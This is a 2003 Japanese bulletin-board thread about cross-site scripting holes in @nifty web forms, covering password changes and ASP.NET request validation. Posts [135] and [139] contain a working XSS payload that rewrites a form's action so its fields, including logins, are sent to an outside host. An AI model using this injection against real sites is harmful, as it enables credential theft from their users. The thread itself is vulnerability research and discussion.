投稿順表示 (276/283)
前のページ 1...271/272/273/274/275/276/277/278/279/280/281...283 次のページ
[153] Re: えび日記 : 「とりまとめてください」
yuu (2003年6月26日 2時46分)
はてなアンテナって、どっか登録しようとしてそれがどっかの誰かにすでに登録されている場合は同じの使ってYO!というアラートが出て、素直なら(謎)その同じのを使うように設定すると思うんで、登録された数だけっていうのは、ちょっと違うような気もしますが、まあ実際どういう感じでロボッツが回ってんのか知らんので、まあそこんとこヨロポク(謎)。
[152] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 18時52分)
>念のためパスワード変更しておこっと。
よく考えたら、私のもパケット盗聴で漏れてる可能性ありますね。
# 捏造フォームの送信先は https ではなかったし。
パスワード変えとこ……。
[151] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 16時49分)
>あわわ、なんかログインパスワードのみ変更ってのがあるんだけど、これでいいのかな。何かもう色々忘れちゃったよ。
ログインパスワードと POP3 のパスワードが別々になっているようですね。いつのまにやら。
[150] Re: えび日記 : 「XSS大王Q&A」
yuu (2003年6月25日 16時25分)
あわわ、なんかログインパスワードのみ変更ってのがあるんだけど、これでいいのかな。何かもう色々忘れちゃったよ。
[149] Re: えび日記 : 「XSS大王Q&A」
えむけい (2003年6月25日 16時8分)
>>パスワードってどうやって変更するのだっけ。
>
> TTY なら GO PASSWORD です。
> Web上ではパスワード変更を行いたくない気がする今日この頃。
そう言われましても【謎】会員種別を@nifty会員に変更してしまったのでどうしようもありません【謎】。
あ、戻せばいいのか【謎】。スパムメーブロックは結局役に立たなかったし。
[148] Re: えび日記 : 「XSS大王Q&A」
えむけい (2003年6月25日 16時5分)
>>>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
>> うおっと。
>> とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。
>
>パスワードってどうやって変更するのだっけ。
https://www.nifty.com/webscr/cgi-bin/pwget.cgi
残念ながら【謎】XSSはなさげです。
[147] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 16時3分)
>パスワードってどうやって変更するのだっけ。
TTY なら GO PASSWORD です。
Web上ではパスワード変更を行いたくない気がする今日この頃。
[146] Re: えび日記 : 「XSS大王Q&A」
yuu (2003年6月25日 15時55分)
>>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
> うおっと。
> とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。
パスワードってどうやって変更するのだっけ。
[145] Re: 話題「**」を含むえび日記
ばけら (2003年6月25日 15時53分)
>話題「**」を含むえび日記(に限らず、過去ログというもの全般にいえることですが)は、記事の順番が逆(古いものから新しいものへ)の方が読みやすいと思うのですが、いかがでしょうか。
あー、そうかも知れません。
ということで逆にしてみました。
[144] 話題「**」を含むえび日記
義珍 (2003年6月25日 15時7分)
話題「**」を含むえび日記(に限らず、過去ログというもの全般にいえることですが)は、記事の順番が逆(古いものから新しいものへ)の方が読みやすいと思うのですが、いかがでしょうか。
[143] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 14時47分)
>セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
うおっと。
とりあえずログは公開していないし、誰が見られるのかはまあ分かっていると思いますが、念のため変更しておいた方が良いかもですね。
[142] Re: えび日記 : 「XSS大王Q&A」
yuu (2003年6月25日 14時41分)
私のじゃないやつって、僕のかも。
セッションIDが漏れるテストなどを試みるときに、なんとなく本物を入れてしまった【謎】気がおぼろげに…。
念のためパスワード変更しておこっと。
[141] Re: えび日記 : 「XSS大王Q&A」
ばけら (2003年6月25日 14時12分)
>で、結局まだ沢山残ってるんですね?
実は私はあんまり調べてないのですが、office さんがそれなりに精力的に調査してくださったようで、3ヶ所ほど発見されています。いずれも未修整で、うち一つは SSL 保護つきのログインフォームです。先日の DOM 使用例はそこできっちり動作しました。
これについてニフティが把握しているかどうかは分かりません。全フォームについて調査していると思うので、気づくだろうとは思うのですが……。
[140] Re: えび日記 : 「XSS大王Q&A」
賄い (2003年6月25日 13時43分)
いやいや、明快、明快、実に解りやすい。
で、結局まだ沢山残ってるんですね?
といっても28日までにまだ2.5日ありますが。う~ん、おまけして7月までにと延ばしてあげましょう。NIFTYさん。
[139] ちょっとテスト
ばけら (2003年6月25日 11時59分)
"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span
[138] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時56分)
>>なぜかここに投稿しようとするとエラーになるので
調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。
================
危険な可能性のある Request.Form 値がクライアントから検出されました。
説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。
例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。
================
この機能はオフにできるはずなので、ちょっと調べてみます。
[137] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
ばけら (2003年6月25日 11時52分)
>なぜかここに投稿しようとするとエラーになるので
どんなエラーが出ていましたか?
実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。
[136] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時15分)
なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。
http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351
[135] Re: えび日記 : 「DOM万歳(XSS大王つづき)」
えむけい (2003年6月24日 23時12分)
なんかタグを含む投稿で? エラーになります。再挑戦
"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span
前のページ 1...271/272/273/274/275/276/277/278/279/280/281...283 次のページ
